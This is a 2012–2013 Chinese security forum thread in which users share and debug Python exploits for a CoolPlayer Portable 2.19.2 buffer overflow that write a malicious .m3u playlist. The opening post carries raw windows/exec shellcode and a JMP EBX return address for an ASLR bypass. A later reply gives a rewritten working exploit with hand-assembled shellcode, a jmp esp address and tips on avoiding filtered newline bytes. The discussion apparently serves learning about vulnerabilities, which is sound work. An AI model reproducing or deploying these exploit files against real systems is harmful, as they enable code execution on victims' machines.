首页
社区
课程
招聘
那位大牛给分析下CoolPlayer Portable 2.19.2 Buffer Overflow
发表于: 2012-12-2 12:52 4025

那位大牛给分析下CoolPlayer Portable 2.19.2 Buffer Overflow

2012-12-2 12:52
4025
本人菜鸟.手拙..求那位大牛给分析下CoolPlayer Portable 2.19.2 Buffer Overflow给我们这些小菜科普下..先贴出利用程序
雪地裸体跪谢!!!!!!!
# Buffer overflow that bypasses ASLR by using a non-aslr module
# Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit
# Written by Blake patched by pole
# Originally found by Securityxxxpert

print "\n====================================="
print "CoolPlayer Portable Buffer Overflow"
print "Tested on Windows Vista (ASLR Bypass)"
print "Written by Blake"
print "Patched by pole"
print "=====================================\n"

# 233 bytes for shellcode available
# 227 byte windows/exec shellcode => CMD=calc.exe
shellcode=(
"\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5"
"\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b"
"\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd"
"\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb"
"\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08"
"\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64"
"\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33"
"\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5"
"\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b"
"\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98"
"\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43"
"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53"
"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f"
"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea"
"\x51\x58")

nops = "\x90" * 6
buffer = "\x41" * (229 - len(shellcode))

eip = "\x75\x52\x46\x00"        # JMP EBX - coolplayer.exe "\x75\x52\x46\x00"       

print "[+] Creating malicious file"
try:
        file = open("exploit.m3u","w")
        file.write(nops + shellcode + buffer + eip)
        file.close()
        print "[+] File created successfully"
        raw_input("[+] Press any key to exit...")
except:
        print "[X] Error creating file!"
        sys.exit(0)

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (8)
雪    币: 72
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
2
请楼主参见《0day安全:软件漏洞分析技术(第二版)》
2012-12-3 09:48
0
雪    币: 159
活跃值: (40)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
3
shellcode在我这里没能触发,不过漏洞形成的原因大致看了下,大牛们尽管拍砖吧。
见附件……
上传的附件:
2012-12-3 16:36
0
雪    币: 159
活跃值: (40)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
4
诶,那个格式好像不是正则表达式……
2012-12-3 16:38
0
雪    币: 214
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
多谢大牛分析....辛苦...小菜认真拜读了分析过程......顶下...楼上V5 在我XPSP3上计算器也没弹出来......
2012-12-5 21:44
0
雪    币: 20
活跃值: (40)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
6
不小心我也研究了这个漏洞了一下。然后在我的机子上调通了。下面这是我的代码
用python 3写的,如果你的是python 2的话得把字符串前面的b去掉。
import sys
nops=b"\x90"*169
eip=b"\x12\x45\xFA\x7F"     #jmp esp
#JmpShort=b"\xEB\xE2"

code=(
    b"\x66\x81\xEC\x40\x04"     #SUB SP,440
    b"\x33\xDB"                 #XOR EBX,EBX
    b"\x53"                     #PUSH EBX
    b"\x68\x77\x65\x73\x74"     #PUSH 74736577
    b"\x68\x66\x61\x69\x6C"     #PUSH 6C696166
    b"\x8B\xC4"                 #MOV EAX,ESP
    b"\x53"                     #PUSH EBX
    b"\x50"                     #PUSH EAX
    b"\x50"                     #PUSH EAX
    b"\x53"                     #PUSH EBX
    b"\xB8\xEA\x07\xD5\x77"     #MOV EAX,USE32.MessageboxA   
                                                 #此处是我机子上的地址你的得改一下
    b"\xFF\xD0"                 #CALL EAX
    b"\x53"                     #PUSH EBX
    b"\xB8\x12\xCB\x81\x7C"     #MOV EAX,kernel32.ExitProcess
                                                  #此处是我机子上的地址你的得改一下
    b"\xFF\xD0")                #CALL EAX

print ("[+] Creating malicious file")

file = open("exploit.m3u","wb")
exploit=nops+eip+code
file.write(exploit)
file.close()
print ("[+] File created successfully")
你们shellcode不能运行的关键%512[^],读取.m3u文件时文件中不能包含'\x0A\x0D'。这一点3楼说的很清楚。最终只要写出不包含这两个字符串的exploit就行了。
2013-1-8 17:42
0
雪    币: 159
活跃值: (40)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
7
6L,这是重新写的shellcode是吧。
2013-1-14 09:48
0
雪    币: 159
活跃值: (40)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
8
《0day安全》?
2013-1-14 09:51
0
雪    币: 20
活跃值: (40)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
9
被你发现了.....
2013-1-14 10:10
0
游客
登录 | 注册 方可回帖
返回
//